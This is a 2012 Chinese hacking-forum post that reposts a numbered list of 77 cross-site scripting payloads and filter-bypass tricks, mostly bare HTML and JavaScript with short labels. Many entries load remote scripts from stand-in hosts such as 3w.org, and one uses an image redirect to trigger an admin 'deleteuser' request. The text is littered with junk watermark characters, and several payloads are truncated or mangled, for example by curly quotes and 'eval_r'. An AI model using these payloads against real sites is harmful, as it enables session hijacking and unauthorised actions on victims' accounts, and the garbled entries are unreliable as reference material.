找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3562|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" A, Z$ f+ L) K! {9 t2 }" ]
( H  C" q- \/ S  p3 c (1)普通的XSS JavaScript注入2 [& \1 a+ r# {6 W) b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% ]. e3 S6 O! Q4 V) Z4 C' e+ s* R7 ~4 t+ m" F! m  l: I
(2)IMG标签XSS使用JavaScript命令
3 g) q% P  L' W% A  r <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" L% ?. }, f) o+ q

- o- u$ p. E4 T/ V. {! R3 m (3)IMG标签无分号无引号
" L& @# u6 B$ S# N& m: t% q7 e <IMG SRC=javascript:alert(‘XSS’)>7 W, j/ g1 d) G/ K0 d

/ j: U% z  r2 p0 j" D: A (4)IMG标签大小写不敏感
& V6 y5 y2 b7 l2 A- a8 j+ y4 |+ i <IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ G  Z0 |. L4 ^1 d9 i5 Q, U2 k0 D
# p/ J5 M5 b# s, n3 N
(5)HTML编码(必须有分号)
) T) @5 [# `% k; _1 D7 c6 j! P5 S <IMG SRC=javascript:alert(“XSS”)>
! R4 k1 @* x4 x) X( N6 r  U5 c/ }; g. k' Z
(6)修正缺陷IMG标签
  g7 y* {3 n6 y* J  R <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' G4 T) W0 ]9 E$ e2 w
! ^9 G2 r- X8 i9 F0 `1 u) K  B
(7)formCharCode标签(计算器)
' n, n+ w! B* V  a; j <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- `: K2 g- q0 `5 Y# x: R
3 R- j0 r( C' N! F- s (8)UTF-8的Unicode编码(计算器)( ~' S! S$ ^! T! K, y5 A5 T
<IMG SRC=jav..省略..S')>
; x8 M  m) b" U: c  l/ W; i
; ]! o! R* \* i. {  b2 q& a (9)7位的UTF-8的Unicode编码是没有分号的(计算器)( b# `, g7 A# E. o: N% h% C& m
<IMG SRC=jav..省略..S')>6 T- @0 s' o- D' ^$ V+ v
% E) P$ Q/ i$ j1 Z2 c
(10)十六进制编码也是没有分号(计算器)
- v  w" W( T( |; q" [% W+ q <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>5 ?" N8 [! a( v2 ?: N" E

$ {3 i  P7 J1 a (11)嵌入式标签,将Javascript分开
; |' m, K: B: S <IMG SRC=”jav ascript:alert(‘XSS’);”>
! x; P/ e. H; Q& S* T. G/ c! Y
: V, |' C( B# S' I' {/ G (12)嵌入式编码标签,将Javascript分开+ M2 i8 F, @: V2 `5 K4 E
<IMG SRC=”jav ascript:alert(‘XSS’);”>! Q% u) ]* J* F! W. @

7 G( E. a, {0 g5 A% C+ m (13)嵌入式换行符
: k9 x8 r6 d4 x* P: u <IMG SRC=”jav ascript:alert(‘XSS’);”>
+ {2 w  m6 d1 Y1 ?$ Z' b: Y) ~' u  Q( e2 H/ j
(14)嵌入式回车7 {& v/ P* m, f2 ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 n4 c: g2 F1 o, Z1 }, z6 P+ x( x' ]
(15)嵌入式多行注入JavaScript,这是XSS极端的例子, n: Q" {! Y6 C
<IMG SRC=”javascript:alert(‘XSS‘)”>
& U" ]  [3 M+ F, @7 k! b/ ~, V! L! z" y) {& R
(16)解决限制字符(要求同页面)
4 }9 D8 \2 z. {# o6 B$ E <script>z=’document.’</script>
6 f+ k2 e+ S* i' c: S6 ] <script>z=z+’write(“‘</script>
$ {; q' t# ~" ]6 D$ ~$ @ <script>z=z+’<script’</script>6 h, y, V" u( Y" L+ G5 x
<script>z=z+’ src=ht’</script>' y/ D" Q4 u$ K. u1 Z2 T
<script>z=z+’tp://ww’</script>  u8 d2 |0 q3 y$ m7 E' D9 c& R1 u
<script>z=z+’w.shell’</script>. U1 ^. a7 y9 c# p; l# f- t
<script>z=z+’.net/1.’</script>
4 k& N% }# N$ v# u5 L <script>z=z+’js></sc’</script>! T! d% b! j; h  I( B! D4 N; I
<script>z=z+’ript>”)’</script>
- R& p: J& W2 ~ <script>eval_r(z)</script>* [0 P9 S( R5 X  H0 a
4 f+ _9 j+ Q/ i8 n, Z- {$ X
(17)空字符7 ]6 i! w- T' K! j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 Z$ n0 k- _( A" w7 W! [
: u+ }, Q- {& Q8 u* Y. I: a (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 d2 F! ]) ~: k% e* z1 L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: _7 l1 v7 h$ E/ L
: N0 e! ]& R* O- s. A
(19)Spaces和meta前的IMG标签5 A4 Y+ u3 ~7 V6 Y) X6 E
<IMG SRC=”   javascript:alert(‘XSS’);”>
+ T) _2 t) n) R  C- K$ [% B$ o
1 P4 x( E. Z0 w( d (20)Non-alpha-non-digit XSS9 u7 X0 d2 ]3 e" U. ~
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* p' j$ R" E7 s
5 y# j! C9 d( p5 ^5 e5 h3 ] (21)Non-alpha-non-digit XSS to 2
$ L8 M$ M1 G0 R <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>1 p+ T0 o1 ~8 ^
# q1 Y2 U. R/ R4 u
(22)Non-alpha-non-digit XSS to 37 ]5 J! m0 t) C! P3 Q$ i3 ~( C% X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" F0 J" R6 c$ {3 {
3 N) m) `- m, K* u5 J (23)双开括号3 i7 \4 @* B* L( ^7 g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* R2 Q3 R, S, ]9 F! G+ c- r
3 s3 K) ^$ q3 f, t" ?0 @; V (24)无结束脚本标记(仅火狐等浏览器)9 A/ e1 f8 x* j' N5 @( i  n5 X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ A3 q8 x- o/ O* e! E8 {  [1 f! M- H
(25)无结束脚本标记27 {- {3 H" Y$ d" N
<SCRIPT SRC=//3w.org/XSS/xss.js>6 c$ u9 @. b% N5 l
4 {: S% f5 A9 B. \2 H3 b
(26)半开的HTML/JavaScript XSS8 |8 r, z5 J" V  O% ~2 U; b% o' P6 W
<IMG SRC=”javascript:alert(‘XSS’)”
5 G/ }  d4 N; w2 u5 Z
7 F8 ^% B% y9 @5 T7 b, `  u% a (27)双开角括号
, \! A) e) V4 L$ ]* C7 h <iframe src=http://3w.org/XSS.html <
6 I, X- u. c# q+ h" J8 `9 m
$ Z0 G  R$ d* N$ t6 G3 q! W) Y7 } (28)无单引号 双引号 分号
: y( q: F) d2 h3 ]* y' f7 ^( J) c <SCRIPT>a=/XSS// G* n. m+ p: i$ B
alert(a.source)</SCRIPT>; w. X& A/ c- F: a

: F, Q) ]4 h- ]" e4 i (29)换码过滤的JavaScript
1 d# [- _- T3 w \”;alert(‘XSS’);//0 _0 ]* r/ D' G2 s; f3 q( w
6 D. t; H5 B$ l' D9 f
(30)结束Title标签
' |! r0 G& l1 c% W  X6 } </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 C6 T$ b8 k- o8 ^1 y  o  H+ y7 Q) j2 j( q( |" m) y
(31)Input Image
, v8 @  k% L% u6 s7 O* E, H- V <INPUT SRC=”javascript:alert(‘XSS’);”>
7 l" L- X% T& S0 U! ^( g% \4 T( i9 o3 Y( k( v# R
(32)BODY Image
3 e, d5 i* c& O2 B# U8 B6 O6 ~ <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- F5 @, G& V" }3 h) e% ]  d4 i4 v6 p( I% ^3 @( {; `# Y
(33)BODY标签
6 W* r) x# p: z) {: C# m# S; h8 j <BODY(‘XSS’)>
* w3 n9 O3 `% ]% U2 T1 t6 f) H- V" {% _8 V6 t; u
(34)IMG Dynsrc3 m$ }3 o+ x9 h- F
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
) h$ ~8 m6 a- R8 E* \2 {* N( y( u7 I
(35)IMG Lowsrc
0 A) g) M4 ?+ r9 S( p <IMG LOWSRC=”javascript:alert(‘XSS’)”>& I7 {2 U) n- R+ H' s
6 P7 S( W6 B! Y
(36)BGSOUND& N3 |. v. o% P3 B+ J  G
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ |6 W$ X7 @. L/ C- u
1 D7 b) v& R) W! e) K- u (37)STYLE sheet
% B/ L- f! X: D/ O+ d, t <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ u0 m& b; J( [! x  M
! Y8 q" u& P' q1 ^0 ?4 ~ (38)远程样式表/ v' \  D2 o8 A( ~$ f% i% ^: e5 v! X
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, s! d1 V1 R: \; [4 \; l( h/ d# F, L+ ?: m: x
(39)List-style-image(列表式)
0 c& [! O2 S. y <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 T: ^! J8 O+ F' m5 t" ^* [
2 n1 i9 |2 g) s+ L( U
(40)IMG VBscript
" E+ _8 W# X! | <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 X3 V. f6 \# S
3 U' X9 I- _# \" J0 ^% u+ B (41)META链接url
$ l- U8 [4 S& r! ? <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 ?# S) T* b, T2 v7 A% l4 X: S$ T  f- j; s
(42)Iframe! \8 {6 |3 c) B# ^3 g  o* M- y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
) z7 p2 H+ n2 o( n3 U% P" z6 X3 [/ {% q0 D* R0 B. ^
(43)Frame( v/ s: k& b# c* b/ @
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 I6 `* [: H: |
) A! n' ]' U7 j" z  Z6 [
(44)Table2 j% L2 d3 N! e& ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># f, L: K' `9 F7 \/ s8 @
" R( [) Z' v5 Q4 W
(45)TD9 e& W6 O  e) h2 P
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' L) }' j- r- w4 B4 x
) x) m0 F/ h& y* N8 L# D5 p (46)DIV background-image
" B4 q/ e# e( \# e3 o& t7 m) U <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>% K, W" Q  Z7 w: f# M
/ l: A5 Q+ P* S5 |% T" k( C
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 [! T3 X! B. q8 h# |! r' p; o
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 \6 }/ l. C2 ~7 D( P5 m
- A. @: I/ Q0 Y5 E* y* }
(48)DIV expression+ J8 U; c7 q0 h! B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 }3 c. U: C$ I# ]
7 I7 V* Q; e" _1 k8 n (49)STYLE属性分拆表达& X/ T. ]1 g6 s' C$ ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# V, [2 U" e3 h1 r0 x5 m% F2 s, F* t) ?: k2 S% X2 o/ U
(50)匿名STYLE(组成:开角号和一个字母开头)
! G4 `, Q/ S* C& G. [% o8 Z <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& M. O' k% d1 E* k: `% g
( x3 {( y* ?. a: t4 M& Q
(51)STYLE background-image
7 w- L; u/ @4 t. h# P! s* m6 Q <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! }3 @+ E5 e/ \" n  X2 Z

- U8 w6 ?. F6 X' c4 Z* ~ (52)IMG STYLE方式
/ F  \% l4 u9 p! P' A! | exppression(alert(“XSS”))’>  N; T, w- h& X" M% a4 q

2 o/ f# u0 r" ^  F4 s6 E" Y( ~, e (53)STYLE background! \4 D3 `; z" e  D5 e, S& O
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ ^$ @% v4 z2 \6 @; z+ z
8 L9 j9 P7 Q: w( c0 v* x9 t
(54)BASE
8 o* v: U3 u( m1 I# n: O# ? <BASE HREF=”javascript:alert(‘XSS’);//”>* c, s4 S0 p, p7 ~8 o7 a9 P
: q, m  y) [( ~7 {1 Q) c
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 o, a  y2 s9 ~9 u
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>* H5 ?# C, G8 P6 ^, G. R

( `: C+ z0 H+ C6 k1 c (56)在flash中使用ActionScrpt可以混进你XSS的代码! p. O4 ~6 r* z) e0 _" K! ?7 x
a=”get”;1 i2 O# y# i4 g
b=”URL(\”";& y* n: e( F: L0 Z# ?- N
c=”javascript:”;) \, l( ~$ M& [* C
d=”alert(‘XSS’);\”)”;  _& v) u6 D: Z$ w
eval_r(a+b+c+d);
- u& U+ w* W( J
& Y8 _. _- G7 i  e3 l4 O (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上" p- L; _7 j  I7 z0 K6 \: w
<HTML xmlns:xss>
4 b$ D. @/ d8 s. |( T <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 v8 y" z( Q+ i/ t# h
<xss:xss>XSS</xss:xss>. m* b- y8 p- a' c/ w# C2 |
</HTML>
9 n! Z" L# l1 ?  Y4 C8 Z- c# @: t) N/ @
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" ?7 l. V% A5 s4 d/ S <SCRIPT SRC=””></SCRIPT>
$ E; P+ g0 C4 W  n/ e0 j, _3 v; C7 N% k2 }
(59)IMG嵌入式命令,可执行任意命令
/ o2 k6 m  E! m) n/ `8 p <IMG SRC=”http://www.XXX.com/a.php?a=b”>9 f+ x7 I7 e( c6 u# {
+ ^: P0 F, ~! A
(60)IMG嵌入式命令(a.jpg在同服务器)  i4 p4 S7 p9 |! g' ?2 {
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 e4 b$ I! c- u

1 k, D6 Z3 F+ s, g/ }( l (61)绕符号过滤( g" c8 k( ?# v, S! U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Z: k$ z1 {5 w. v) j- h% [* a+ I; \+ E* L: x
(62)
" [. @& G* q& Q" L6 p( w <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. Z. P4 I+ Z( T% }) C- @# H
% |- w. ~1 o/ I (63)
0 d* l3 q  U, B! h <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
* F9 ~0 H" e0 ~1 I& K$ B/ U) y+ T; Y+ H2 g
(64)6 \5 ]: \- U! S' O" H
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
+ I' r/ o) u# q5 D. g  F: z" v6 S* @3 j
(65)
+ W1 Z7 Q( l* h9 N, l4 |+ O& D8 M5 B <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 t2 r% @1 G6 B# ^$ Z+ r. J: X8 \# ^  z
(66)! ^0 _+ l& O- N% [' b5 [
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>7 ]9 ]1 N+ m  _& O9 p0 C

0 J$ z2 b5 s, G0 v (67)
; e2 \9 F; g- H: L <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
$ F2 d% I/ `* J: c0 f! V
4 f" n' C( J" X) T. E (68)URL绕行
' D4 c( K5 n1 c, t# ^ <A HREF=”http://127.0.0.1/”>XSS</A>
1 y% F- [* A' Y' t; J9 u
9 q* t0 B( C. t6 X9 {/ Q (69)URL编码
# q7 M% l1 @7 s9 D; s( w <A HREF=”http://3w.org”>XSS</A>
5 u% j" I# i' U
6 y  n. A! x0 V# c- m: a (70)IP十进制
! |% o, _! E; I8 z# g1 R <A HREF=”http://3232235521″>XSS</A>, L" m# a% I  E& ]9 f
: g6 `7 D9 n6 s. R0 T
(71)IP十六进制
1 Q) g4 {$ d. @1 l9 O <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# Z  J1 C& A! a4 x
; W" f. h$ ~) e0 K2 L( I" O (72)IP八进制# k6 V  e: n: a+ I4 U) `' d# H2 Q2 l
<A HREF=”http://0300.0250.0000.0001″>XSS</A>6 s* }4 q2 A% s# |

( L8 M7 e9 L) H" V( r' \3 k' i* T (73)混合编码
7 G" K( L" @& |( E <A HREF=”h
$ n; U7 }, i3 f& v1 q tt p://6 6.000146.0×7.147/”">XSS</A>
. _1 t* @; v+ F+ |' e' j6 ], ]; ]* x
(74)节省[http:]: d" w) S+ i7 q7 N, Q! \
<A HREF=”//www.google.com/”>XSS</A>0 B; u# _3 l) `: u9 ^
2 s( M; c! \6 q  w5 I3 I' [
(75)节省[www]
) D3 N4 d* z! M$ c: b# M% j9 I <A HREF=”http://google.com/”>XSS</A>5 r' i3 B; o# `6 D* x( q0 ]: W# K
, P0 r; q' _; P1 Y0 X: e% K) B
(76)绝对点绝对DNS
+ h; N. w! X# P" x. y; A8 e3 U <A HREF=”http://www.google.com./”>XSS</A>2 `! G0 s! l" w" b
3 E+ |; P* m8 u* F5 a. v, W8 I) B. C1 z
(77)javascript链接( S1 o3 T. s2 H! g
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表